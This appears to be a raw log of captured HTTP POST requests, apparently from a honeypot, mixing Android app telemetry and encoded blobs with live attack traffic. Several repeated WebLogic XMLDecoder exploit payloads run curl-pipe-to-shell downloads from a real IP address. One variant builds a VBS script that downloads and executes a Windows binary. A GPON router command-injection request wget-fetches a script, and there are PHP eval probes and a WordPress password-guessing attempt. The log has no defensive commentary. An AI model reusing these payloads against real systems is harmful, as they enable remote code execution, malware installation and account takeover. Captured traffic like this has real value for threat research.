User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 416
Cache-Control: no-cache

EKxWk9ieYlveNma5elfwVsqCBpPXMrwNkYz0AdXgmboWpxKMV2+uiuf3a72YUnHcyZu+3uCiH+OiM2HU8jv4C9vkLkJGQ6Ocv7VrACLseBuQjCpTF4r0D2IRYOIlnGBHbq5P2ELWRblydRiE3KWV9xi8M6upAYS9xSM4KxYx88JjL4NimOzlpyyc3cUHrnxlUi+19gFU4a/xzMBGLVtQNfs/HYRCRzlp4Cx5aICtioUVXUkqvE8/ZP98nYeJurv2FoLMYovJJnA6mIR4EqzNAz9eC4SC6GDi5J51Ah/7bHO5If+3op+lFyeASIlYDVTxNVYvoZdmSLGo9luPjJ/Jrq1MdL8RWW52Pw3YGVlVSd1oKwF4ZV30+/9FaxQc0jCDORLPTQRttDj+PiOpIGN1y2bnnZ7Pxg==

POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496717505026
X-Umeng-Sdk: Android/6.0.9 PopCat%2F2.1.2+MI+4LTE%2F4.4.4+D2EA899797B039FCD23DDA127C0FE621
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2393

1.0517e9b7f56240b158d00af66@2a5557b6525c7ee069ecfe09c5af4174433522e955975e55361aaa93d1893159÷˘¶ìËQÉxú≠Xks⁄H˝+)>Ìn\ûÓVÎE’|ê–#8nà@ññ)óêHËA‚°©¸˜Ω-«±ùx ≥ Ö‘Õ}úsÓÌ€¸Ÿ[TÒπ◊ˇ≥ólΩ˛ˇÏôh†)™ÆPKQâJ”TË@7
E!ö§⁄mJ„^ø˜)œ£≤w’ªoäm	<㙂:OÀMúÏ6ª}ß’ı∂⁄F·˛˙SµÑ{ÿΩflı˙ò™í®`Å,ê´ûëÓ∂`æ/Ùæ^]ú( UB?òˇÉ;êHAV®®K5ES&Îä•àï-]J“Æ™UûL¬}Úœ#EUQ(ÜDπùœ˚∞ÜïÔQ],aQ"î*‰û¥3ˇ©NvªÓ”’Â\â¢å5ˆœM=ÖvqÛœ
ò`Y˝
öN&’1&Ü¢Úˇ"!íÖ®NëEk†Àöv9¡SUAD‰WIEß∫N4
Àh A,Î2’LCî/ÖÑAˆ*_»D~!˘B2·ÆD$“•xÉ™,#Ex;·˛q’€AiUÓ:§¬f_m√UÚâøª”_YÜQ≤®™ÕuÔÆ5XM (qí˝±™7Z¥OÈ˛
≈MÓ¡YØØÖg˜˜<|OËÈ˚òìLx¸@oäÚÑ˛±øflßùØo∫íLe¸Éa¨™
`WáÀeÒW«2ج¯˛˚3,BU`Ò™◊l_.Hº˜ìØWΩ§å• ÅJ*¯˙Ò˝´ÏÒC¸ ^1)PEïÖ_‰DPÅ÷GNfi<,^„ј|IF/9°≤à©'
∆T¡?s%Í+úà·—Àp“
H@˘¢¥P8≈OuÚ÷îÚ'
&"û¸dX@ÁÑOíD…e8È≤.
®pRıI‰où?Ø
Ìò
*í…œÜÈ€Ä*2í_
†‚œÄÚ÷ØKó
¥í+ Ì≠ì0NjË2LÛ$æØì/M≤„ß#ÏFî˚]≥ÿü∑‹—áœü¥˜`-‹n7	?ÅD,'ÍB^Ú±-∞®ƒÖKIzÿsHÍ]Á¥GÆÒ5ŒŸ*o"Èaï†ˇ`h1∞mÎ}T≈‡â悉êF…}
rÿÃÜÔË≠kÚ3∞i´∂…flw="ñQ]¡ûÌÖ®ØH˝HÍ´J)ÙïòüÓ≈∂NÀ=üoè
”˝‹M∂oÍÆâFÆOX¶ùG∆̓≤ç∑˙ÚÒäwˆ`]0˜f∏‰xC¡w≠µì≈≈»òR«àNÛ“Ò&ÖüçEøòû˙Ìò¯fik∫≥]îÚΩ”ÓéX«»RIpw”Üû⁄ÿ⁄Ù|õô
[/¬∂˛"f≥»ˇhO6ÛíµXõ•#{R8Ÿ1√l˝6/|óùXlXô}ìçåY&afiT3HfiD¬dΩ∞OKü¨◊ãBÃ˙Í„ºúıêS>µOÎdÚ“◊£'øù¨,ã∫Ïù6"¨ùmXsZßl÷2èâÛ2pß⁄‡ofÚh›q«gÊöB`[i`Ãrflõ@ÏÅ5€lœ<è<≤õ“ëaj¶˝î	|=2d∂√#s£=3|x±36k«í„Æ<≤ì§yŸ¯òsµ	v
ä!ˆ≥©Ëx>p4=;ÓzÌ∏˘ö
_¿2u≤à¿:Ú›ï8Ú÷¥Ì!¬O9ÕK»
›f„∆—ˇ"+cù:‰fÌxcò°¿ëCÄ{¬∞”öfi<:ŸÙfiµy©›˘æÓö{vF≠µØGM]8≥”™
Ï1 §†´33&˘»ùÅŒ÷©O|`A_;êãc;©ìY9d÷"
YivX‰(∂gg[∂l™/µüÂ<Fˇƒ
,ç1hbÌ∫p¿∫OÄ	œŸ¸√6L¬Y∞÷∞K”?È°7ˆ?c¡io
ÿŸ>yV ä)
ä0ú¨GdÔ1ƒN?#3/96AÁN1Ÿ¯YºÜJ:ç@fi¿?0íM ´2섶ȃ©|OlÔË6ÒaA‚]0”w˛›∆õóúŸüyÉÏ&cô)pÑ!F*¬#îkòÁ¿BΩÃ
ßòÂövjX-B‡u^∆ñzªæ&‰yÙJÙ؆fhh®8™Ω’pP¯âìÔn Ê
ʵ
,xæfçᲖ∞2÷˙àÅ|W/€u`˚-œgô„ZXÇû2Ÿh⁄Ôøœ˘M˙Í}µ{l]l8v
ÚÀ∑ÊO(Ã∞QX◊)Ô–=◊º˝8büÕ€ßo>µ◊YwJ=\)óM˛¨çãfl[‰¢
k~fi±œåè9=wüFa~ˇ–fiüı‹∞l‡>∞oÍŒı]VE⁄]ç¯qm“r’5–ê
´	>‹Bo≤‰¬1⁄ „ÚgÖIô1¶@
÷TKfi-¿<”Vö±¨Ã÷-(ƒ
äpõ9Ymedl÷V4– ≥›vDfÁ–≥v∂∂¬ ^(ˇ8ö,Ë≥=f»õÔdµ»a,Ä5èÌo“4NÖ[^¸≠∂πA;éæ;ôª¨√‡∞ı(ƒÈ@”f€¿∆g≤J†V¯–ÖÚ»|—áÚ‹I&Ü≤Abö|k>?≥¿’lkk
o/êΩdÉó«äÈΩˇ¯>üó)≈w ÕµNøzje\Wi¸Ì‰‹•´2‰¯Ûã≤––æ@˙ä—∑P_V˙HËÀF_¿}"˜ë‘7}ÕÍKÉæ!˜Xà∂
∑8a˘›ß∫‚™®Íwurxáfl˝Î ÁˇÓFâhÛwf.¨xÛLk“5∫Êó†oZÈf(¯"¡Öí~Z]‘a?óP¯¯≥±Áø	6∂j }Õßâ°—ÅÒÃΩÜøNxE,¬ÁXñ…íÜÇ≤î‘pA∫\Ü"
’d!FT‡n.«èY}üx
flÜò'†ü©ΩÀ‚£;UËßnzàä2ÍÊÑ˘tíá™
¥‡Q ã÷aYvc…√Ød¸vˇ“‡C
√8(
T¿î Ñæ~˝0¥å”@418b9bb61ad7d2e02767b70975247d7436bed9e9f11c41554191039373020500 cd5fff46f7c64f24d9f26bbc314d13cf

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
:µÃ©Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î®Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache

Bw22mXUXA4ZNHsUp4KG6fWZBhuyiwPMMIVwuh3pk8gPzeg7PFI/EPtOV2jE9fsIz0tk/DBYiU7WMfP1Cjs9yzmva00fjmn8i/aLNlU/LZ5/iwFIXFBwMssKtEKi5sub2TJ1qXE3TLEskQX1A+fpcznkLPfaA6BwpLWSNvGh52inn/HtvXMAQtB7MJYbOAQMkihynUSDw4/qyXeJC1zbzWtpSzoNvGt5Xxxr1LCkMydjPwEo7m0AcUjGG7w6F9zlhXsfzUa4d1/vSLn7hOg3Y6/dusgC14nPBo6RY3sffNuHIfYQW7GVbLX0Lou9BthIPgRI7KUQcxNfEdDZAM4yL563dqUPN/bXGrON0q4HzeLC+D2ndFUJV3Nty

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1031
Content-Type: multipart/form-data; boundary=lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

706169
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

754fa4f1e226c43b298238c2739d4278
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd--


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /CGI/Execute HTTP/1.1
User-Agent: curl/7.35.0
Host: x.x.x.x
Accept: */*
Content-Length: 125
Content-Type: application/x-www-form-urlencoded

XML=%3CCiscoIPPhoneExecute%3E%3CExecuteItem%20URL%3D%22Dial%3A00%22%20Priority%3D%220%22%20%2F%3E%3C%2FCiscoIPPhoneExecute%3E

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=456456

POST http://behacdn.ksmobile.net/adsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 78

Ns}›~
ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcpj@WTıÖƒ¶µy¥LRÖÕ_?⁄ÀhX{$∑ãÑç"–JÛ∑

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496391414215
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2493

1.056aae48ee0f55ad48a00142f@e77f4dd0e2fdae30dbe89ae5dab79eeb8847698ae95046185f6dbee004792959é
à¶Äì‰VÊxúÕWks¢ ˝+)?›{ON•Í|hÂq0ÈftP“\OY( ɯĩ˘Ôwc2â3ôì˚ò∫ßíîïÿ¥{Ôfik≠Ω⁄œùe‘ÂsgøÀ4<ÑiGÈùÎN∏9tî~Óp]]ì˚¬†è@√™."±œı’ûx˛A“yS¿ß/µ<XUîˆyQf^
Å˚lõ√#ÿ·ŸMØVaÊ~XÖyñ«(Ƭõ›&.´õ¢\fl¯Ö_ÏPp∫Ò∑€º›bøäqUC§j◊Qx±fl«À}ıØúSÈtæ\?U‰ìpWyee¬ÚˇVMOÏÒË˙ªdóe¥u~jü¸5›ÈI®À]ˇY÷Ô˚´@CHÊ≈fi{

°>‚≈˜‘”ö,…›Óª
MÓıªÚ;MÓãr˜›Å&BW‰fih/Û<˜~@Éz§fi€†˝ÒÂèÎŒ˙ø∂¿GΩ>õÈ‚“MÉ}GÅ|]‚âØf6ÿ»uTÌaô{nŒøÏKØä㺣à\Øù odA‡"ˇíÂW˛?NsUz5∫$˘gkó8ô;ã,vEÈßkÔæR∞pı©]¯nÔÕ,览ÜìµÀØàèü´]ÊπƯvñ^O˙ÆÔ è/◊ù(ÙÇV»ü;+/N√`QÜ{P¯Óú¬Û˝p∑[ψÀ™fi∂˛˝”G¸ш∂€MwŒé‘ıºPÏÖ!∑í$/{«Ò"Z=ÓY¿êÿùKÏ=X*√]ëÓ´ßï>‚˛¡s=<Ì[¯Eix"±.2XhœDÃ+ÒŒ÷⁄S≈Yÿ9lìüw}/^ÓóÏ…|xÁqJØ´¯]•flSVÇ“‡AúmÀ8Ø⁄qu2»@‘Ó˝dªt¶Lµ5Œ≤YC‹õÒ◊·®±fiß{c∏>Y™èX≥Ê	“j“¨ñç¢˙'◊—–<wv≤úY‚™4•ÜâàJÍê∆Èë›ß´•1CÆsdU_A$g˛°Ù∏L‹BË(q≥YÊ"éŸÉ5Û‹RiÏ™
º‹»r∆'í¯Çõh"I¶¢kOOÆ:ãÒÄnó9Âòs⁄›#˝ËÎ}‰fièœÈÔ
lû¨ÅwõS˘nû«3ü›™>œÏŸÜ6ABT,±dQÉà‘ãñç!H¶At&gCO,õ‡·wëÁ˘eÏWëS¢Í¥!ŸXtì5‘LjÇF	Mhô†©>≤Sd√™0JÁπoÙÎ@Ô√I&©üª—r∞B=Nºm¬ZL€÷‘—xWıÜLƒl_Ä<U≙:dÖhÕXbÕ,ûÁi'7”‡4⁄„	øt“ç1ƒQ”‘UaΩÅgt√ö0{ 1{√S{≥ƒDñÌ◊ÏÙrÆy~y2WÏ
"à	Æäkö—ƒu∆µeÃñÈÙÙDåQ 
ÖAŒæE0,© OÀ8Öû4sw√lvÇà»24Åf‰Hù±Ha›R◊"m÷'ÜH˚:ÓçÂ@‰¸≤f5CSÜm
»twA&ÁâLˆÊ≈4§	"7â™2ë&&ÁfnLUÌË™¶@Ï b6çÊ9∆˝2—Ç9“˛Ã◊iüÛåY≠æ∞€èfßuAõYÖ
—‘RGÌÿ∂Ö®z¬úÈqûC#2`¡´∂‘
Á⁄iD«ÿ
]™r.j¢j¬ùç˘;€îÙCç™—˛∂猖,u≥ID
4∑ë@[Í$µhqbâ
yç#™y"Ÿîghõä‰à≠sta÷@€üıÜÅJflh
¬=´mz§j∫°	ë(ÇF9¶ƒÏ4Ö^PEœ`˝ƒl=√É¡E{&Q`Ã8œ·Åø∆Ä\E4A[V2FVBö7ç Í0…r«íqMìuM=.	P!íçR“l$¯_r1æ]
td≥⁄GÈa≠u:πªd¸cÖ4∏°P/…L‡k¶'`zFIM7‡n•o¢cxz∫≥IEN¢h{»‰‘fO™KÇÑ"ò6;ã# TFõAJ≥1VÔGÈì¢èKt⁄2a∞Wµ∂†∂’jhΩvÆ

cDAӤ
:5¥sC*fç±˚‡›O8˜fid81EΩR'≈›i{µŸÎV?0Õ(ÙŒ<R4â]9öd,õÄVP)‘'iª∆ø3EÀLJaÍX–ï
(¥Ö⁄êƒÖ˜ÉÙ££9i!ãúŸVeÜ<∞Ù?fL†6üß¿&t%
Ljuz.4Æ⁄ö¡¥ÜÛÅÓÒ`:уπ∆X¢ô≥ñ[-fl_lÁ£eCWÌ…Ê&º7y®Î∑y^ƪ(v_ΩçòSÛφã÷
;
íãˆΩ≤åØ‚œyq›ô|^=€¯jü^∏{˜≈cóÖW∂ÚâÙ˙≤¯h«UÏ{È‚—ˆ˘;ˆÚ˝ Û´}yNy{E∑æ,™“Û7qænΩıËêa¶Ô›flGœô¨<gÑ<æ5¢é¡ 4ŒçºOÛA
Îfxç’•£'∆@èàZ¿∞⁄ÇoRÎÜ€å4Ö˺‚rª·£YÌ9˙Œ¿Îvú®¡é÷‰€òê±…f™/–§UhØ"∂—!«Y∆¥E¥¡ ë¬é#Éë‘2Jfl™}·÷˝Náœ∂Æ¡oËdΩŒìZ? 5pØ%.∏%` SXlOè,3AŸpT‚<ø`ÈΩ>6±1>‚3∂ –¡yPqtU⁄≈΋kODQëÜäÆ)í®®ú"ÀJ+=]A]E(CNDEP‘Wd§à‡o˜mƒ	9»WÀ¢≈ª(Ø p≈_˝Ì ßá=[»[ø‹ñfi˛2÷'ÿ\p©{√›Ù;œT8flQt«˙ ™“ÀÉKé<^&aÛÇ—]ÏÛ™lØë¶zn E6Ò~œÃ ¯v÷Åoka¿Ûê@(OΩæ$qÀ%͈e‰∑â„›6ıÍØÁ§Öøπ˙∏oö4ºÖ«Ûe∫=“”]ˆ•˝‰>üÍ÷ûˆƒèÁ{§ü²£∂R/_Ô°}.n!Ù#/œœwSflÀ∂†◊∆˝Õ˚6fi£VyQîQÄã1«q_渕óÛ@6376e5d0bc8bc8303a9eb2e52bc143eb1c31c68a2126ea18bb1b55e0840f1900 36c205d54670cef71307d30ea9d92ef1

POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive

<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>

POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /GponForm/diag_Form?images/ HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: x.x.x.x:80
Content-Type: text/plain
Content-length: 119

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://51.254.219.134/gpon.php?port=80&ipv=0

POST http://t11.proxy-checks.com/favicon.ico HTTP/1.1
Host: t11.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST http://appinfocdn.ksmobile.net/gmi HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: appinfocdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 215

